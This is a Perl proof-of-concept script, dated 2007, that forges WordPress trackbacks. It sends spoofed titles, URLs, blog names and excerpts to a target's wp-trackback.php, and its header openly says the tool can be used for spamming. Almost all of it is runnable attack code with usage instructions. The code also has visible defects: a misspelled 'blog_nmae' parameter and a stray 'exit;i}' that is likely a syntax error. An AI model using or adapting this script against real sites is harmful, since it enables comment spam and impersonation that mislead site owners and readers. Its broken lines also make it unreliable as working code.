#This is a simple Poc of how the trackback utility can be spoofed. The same can be used for spamming purposes as well.
#example:
#C:\trackback-abuser.pl.pl http://192.168.2.3/apache2-default/wordpress/wp-trackback.php?p=21 Google3 www.google.com Google Google
#
#
# Wordpress Trackback Abuser
#
#by NotSoSecure // www.notsosecure.com
#
# coded by sid //sid@notsosecure.com  // 07.04.2007
#
#
#
#
#---------Success----------------
# Trackback Successfully Posted:--> Well Done











use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
my $browser = new LWP::UserAgent;
$browser->agent("Wordpress_Trackback_Abuser_By_Sid" . $browser->agent);

if (@ARGV < 3)
{
print " -----------------------------------------------------------------------\n";
print " Wordpress Trackback Abuser\n";
print " by NotSoSecure // www.notsosecure.com \n";
print " coded by sid //sid\@notsosecure.com  // 07.04.2007\n";
print " ------------------------------------------------------------------------\n";
print " Usage:\n";
print " trackback_abuser.pl <host> <fake-title> <fake-url>> <fake-blog_name(optional)> <fake excerpt(optional)>\n";
print "\n";
print " ------------------------------------------------------------------------\n";
exit();
}


my $host = $ARGV[0];
my $title= $ARGV[1];# Title to appear to victim
my $url= $ARGV[2];# URL to appear to victim
my $blog_name=  $ARGV[3];# blog_name to appear to victim 
my $excerpt=  $ARGV[4]; # excerpt to appear to victim


my $responde = HTTP::Request->new(POST => $host." HTTP/1.1");
$responde->content_type("application/x-www-form-urlencoded");
$responde->content("title=".$title."&url=".$url."&blog_nmae=".$blog_name."&excerpt=".$excerpt);

my $out=$browser->request($responde);
print "\n\n Wordpress Trackback Abuser\n";
print "\nb y NotSoSecure // www.notsosecure.com \n";
print "\n coded by sid //sid\@notsosecure.com  // 07.04.2007\n\n";
 $out2 = $out->content;
#print $out2;
if ($out->content=~ /<error>0</ ) {
	print "\n\n\n---------Success----------------\n Trackback Successfully Posted:-->";
	print " Well Done\n\n";
exit;}

if ($out2=~ /Duplicate comment detected/ ) {
	print "\n\n ---------------------Error-----------------\n\n TrackBack Unsuccessful\n";
	print "\n\n Title already Exist,\n\n\n Change the title and try again\n\n" ;
exit;i}
else{
print "\n\n ---------------------Error-----------------\n\n TrackBack Unsuccessful\n";
print " Something Wrong Happened.. Check the trackback Url again";
}